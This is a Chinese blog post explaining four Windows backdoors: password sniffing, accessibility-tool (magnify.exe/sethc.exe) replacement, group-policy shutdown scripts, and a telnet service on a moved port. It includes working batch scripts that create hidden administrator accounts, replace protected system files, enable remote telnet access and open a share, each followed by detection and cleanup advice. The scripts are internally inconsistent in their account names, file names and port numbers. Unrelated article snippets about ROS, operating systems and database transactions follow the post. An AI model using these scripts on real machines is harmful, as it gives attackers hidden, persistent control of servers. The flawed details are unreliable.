Windows系統的四個常見後門

2021-09-26 06:01:49 字數 4894 閱讀 5790

後門是攻擊者出入系統的通道,惟其如此它隱蔽而危險。攻擊者利用後門技術如入無人之境,這是使用者的恥辱。針對windows系統的後門是比較多的,對於一般的後門也為大家所熟知。下面筆者揭秘四個可能不為大家所了解但又非常危險的後門。

這類後門是攻擊者在控制了主機之後,並不建立新的帳戶而是在主機上安裝嗅探工具竊取管理員的密碼。由於此類後門,並不建立新的帳戶而是通過嗅探獲取的管理員密碼登入系統,因此隱蔽性極高,如果管理員安全意識不高並缺少足夠的安全技能的話是根本發現不了的。

(1)安裝嗅探工具

嗅探工具對系統進行實施監控,當管理員登入伺服器時其密碼也就被竊取,然後嗅探工具會將管理員密碼儲存到乙個txt檔案中。當攻擊者下一次登入伺服器後,就可以開啟該txt檔案獲取管理員密碼。此後他登入伺服器就再不用重新建立帳戶而是直接用合法的管理員帳戶登入伺服器。如果伺服器是乙個web,攻擊者就會將該txt檔案放置到某個web目錄下,然後在本地就可以瀏覽檢視該檔案了。

(3)防範措施

嗅探後門攻擊者以正常的管理員帳戶登入系統,因此很難發現,不過任何入侵都會留下蛛絲馬跡,我們可以啟用組策略中的「審核策略」使其對使用者的登入情況進行記錄,然後通過事件檢視器檢視是否有可疑時間的非法登入。不過,乙個高明的攻擊者他們會刪除或者修改系統日誌,因此最徹底的措施是清除安裝在系統中的嗅探工具,然後更改管理員密碼。

放大鏡(magnify.exe)是windows 2000/xp/2003系統整合的乙個小工具,它是為方便視力障礙使用者而設計的。在使用者登入系統前可以通過「win+u」組合鍵呼叫該工具,因此攻擊者就用精心構造的magnify.exe同名檔案替換放大鏡程式,從而達到控**務器的目的。

通常情況下,攻擊者通過構造的magnify.exe程式建立乙個管理員使用者,然後登入系統。當然有的時候他們也會通過其直接呼叫命令提示符(cmd.exe)或者系統shell(explorer.exe)。需要說明的是,這樣呼叫的程式都是system許可權,即系統最高許可權。不過,以防萬一當管理員在執行放大鏡程式時發現破綻,攻擊者一般通過該構造程式完成所需的操作後,最後會執行真正的放大鏡程式,以矇騙管理員。其利用的方法是:

思路:偽造替換 magnify.exe

(1) 構造批處理指令碼:magnify.bat

@echo off


net user hack$ test168 /add


net localgroup administrators hack$ /add


%windir%\system32\nagnify.exe


exit
作用:先建立管理員使用者,在執行原來的放大鏡程式

(2)檔案格式轉換

因為批處理檔案magnify.bat的字尾是bat,必須要將其轉換為同名的exe檔案才可以通過組合鍵win+u呼叫。攻擊者一般可以利用winrar構造乙個自動解壓的exe壓縮檔案,當然也可以利用bat2com、com2exe進行檔案格式的轉換。我們就以後面的方法為例進行演示。利用bat2com / com2exe,battoexe(圖形化工具)等工具把bat檔案轉換成exe檔案,如:

bat2com magnify.bat       將magnify.bat轉換成magnify.com


com2exe magnify.com    將magnify.com轉換成magnify.exe
(3)放大鏡檔案替換

下面就需要用構造的magnify.exe替換同名的放大鏡程式檔案,由於windows對系統檔案的自我保護,因此不能直接替換,不過windows提供了乙個命令replace.exe,通過它我們可以替換系統檔案。另外,由於系統檔案在%windir%\system32\dllcache中有備份,為了防止檔案替換後又重新還原,所有我們首先要替換該目錄下的magnify.exe檔案。假設構造的magnify.exe檔案在%windir%目錄下,我們可以通過乙個批處理即可實現檔案的替換。

@echo off


copy %windir%\system32\dllcache\magnify.exe nagnify.exe   將放大鏡程式備份為nagnify.exe


copy %windir%\system32\magnify.exe nagnify.exe 


replace.exe %windir%\magnify.exe %windir%\system32\dllcache 替換放大鏡程式


replace.exe %windir%\magnify.exe %windir%\system32


exit
上面批處理的功能是,首先將放大鏡程式備份為nagnify.exe,然後用同名的構造程式將其替換。

(4)攻擊利用

當完成上述操作後,乙個放大鏡後門就做成了。然後攻擊者通過遠端桌面連線伺服器,在登入介面視窗摁下本地鍵盤的「win+u」組合鍵,選擇執行其中的「放大鏡」,此刻就在伺服器上建立了乙個管理員使用者gslw$並開啟了放大鏡工具,然後攻擊者就開業通過該帳戶登入伺服器。當然,攻擊者在斷開登入前會刪除所有與該帳戶相關的資訊,以防被管理員發現。

(5)防範措施

進入%windir%\system32\檢視magnify.exe的檔案圖示是否是原來的放大鏡的圖示,如果不是的話極有可能被植入了放大鏡後門。當然,有的時候攻擊者也會將其檔案圖示更改為和原放大鏡程式的圖示一樣。此時我們可以檢視magnify.exe檔案的大小和修改時間,如果這兩樣有一項不符就比較懷疑了。我們也可以先執行magnify.exe,然後執行lusrmgr.msc檢視是否有可疑的使用者。如果確定伺服器被放置了放大鏡後門,首先要刪除該檔案,然後恢復正常的放大鏡程式。當然,我們也可以做得更徹底一些,用乙個無關緊要的程式替換放大鏡程式。甚至我們也可以以其人之道還治其人之身,構造乙個magnify.exe,通過其警告攻擊者或者進行入侵監控和取證。

補充:與放大鏡後門類似的還有「粘滯鍵」後門,即按下shief鍵五次可以啟動粘滯鍵功能,其利用和防範措施與放大鏡後門類似,只是將magnify.exe換成了sethc.exe。

相對來說,組策略後門更加隱蔽。往冊表中新增相應鍵值實現隨系統啟動而執行是木馬常用的伎倆,也為大家所熟知。其實,在最策略中也可以實現該功能,不僅如此它還可以實現在系統關機時進行某些操作。這就是通過最策略的「指令碼(啟動/關機)」項來說實現。具體位置在「計算機配置→windows設定」項下。因為其極具隱蔽性,因此常常被攻擊者利用來做伺服器後門。

攻擊者獲得了伺服器的控制權就可以通過這個後門實施對對主機的長期控制。它可以通過這個後門執行某些程式或者指令碼,最簡單的比如建立乙個管理員使用者,他可以這樣做:

(1)建立指令碼

echo off 


net user hack$ test168 /add 


net localgroup administrators hack$ /add 


exit
(2)後門利用

在「執行」對話方塊中輸入gpedit.msc,定位到「計算機配置一》windows設定一》指令碼(啟動/關機)」, 雙擊右邊視窗的「關機」,在其中新增add.bat。就是說當系統關機時建立gslw$使用者。對於一般的使用者是根本不知道在系統中有乙個隱藏使用者,就是他看見並且刪除了該帳戶,當系統關機時又會建立該帳戶。所以說,如果使用者不知道組策略中的這個地方那他一定會感到莫名其妙。

其實,對於組策略中的這個「後門」還有很多利用法,攻擊者通過它來執行指令碼或者程式,嗅探管理員密碼等等。當他們獲取了管理員的密碼後,就不用在系統中建立帳戶了,直接利用管理員帳戶遠端登入系統。因此它也是「雙刃劍」,希望大家重視這個地方。當你為伺服器被攻擊而莫名其妙時,說不定攻擊者就是通過它實現的。

telnet是命令列下的遠端登入工具,不過在伺服器管理時使用不多也常為管理員所忽視。攻擊者如果在控制一台伺服器後,開啟「遠端桌面」進行遠端控制非常容易被管理員察覺,但是啟動telnet進行遠端控制卻不容易被察覺。不過,telnet的預設埠是23,如果開啟後,別人是很容易掃瞄到的,因此攻擊者會更改telnet的埠,從而獨享該伺服器的控制權。

(1)修改埠

tlntadmn config port=2233 			//修改 telnet預設埠(初始23)


sc config tlntsvr start= auto


net start telnet
乙個批處理,可以根據需要修改。轉換成exe等等,思路很多。。。

@echo off 


sc config tlntsvr start= auto 


@net start telnet 


@tlntadmn config sec =passwd 


@tlntadmn config port = 2233


@net user hack& 123456789 /add 


@net localgroup administrators hack$ /add 


@pause 


@md c:\windows\sharefolder


@net share myshare=c:\windows\sharefolder
(2)遠端登入

攻擊者在本地執行命令提示符(cmd.exe)輸入命令「telnet 192.168.1.9 800」然後輸入使用者名稱及其密碼記錄telnet到伺服器。

(3)防範措施

對於telnet後門的方法非常簡單,可以通過「tlntadmn config port=n」命令更改其埠,更徹底的執行「services.msc」開啟服務管理器,禁用telnet服務。

其實,不管什麼樣的後門都有乙個共同的特點——隱蔽性,是見不得陽光的。只要大家掌握一定的系統技術,並時刻提高警惕就能讓後門顯形。知己知彼,了解後門的原理,就能夠從根本上終結後門。

ROS catkin編譯系統的四個步驟

1.宣告依賴庫。首先,我們需要宣告程式所依賴的其他功能包。為了給出依賴庫,編輯包目錄下的 cmakelists.txt 檔案。該文 件的預設版本含有如下行 find package catkin required 所依賴的其他 catkin 包可以新增到這一行的 components 關鍵字 後面,...

作業系統的四個特徵

1.併發 指兩個或多個時間在同一時間間隔內發生。這些事件在巨集觀上是同時發生的,但是在微觀上是交替發生的。注 並行 指兩個或多個事件在同一時刻同時發生。作業系統的併發性 指計算機系統內同時存在著多個執行著的程式。例如 乙個單核處理機同一時刻只能執行乙個程式,因此作業系統會負責協調多個程式交替執行 微...

事物的四個特性和四個隔離級別

事物是一條或者多條sql語句組成的執行序列,這個序列中的所有語句都屬於同乙個工作單元,要麼同時完成,其中如果有乙個失敗,則其他操作都要回滾。事物是乙個不可分割的資料庫邏輯工作單位,要麼全部完成,要不失敗回滾。事務執行的結果必須使資料庫從乙個一致性狀態變到另乙個一致性狀態。乙個事物的執行不能被別的併發...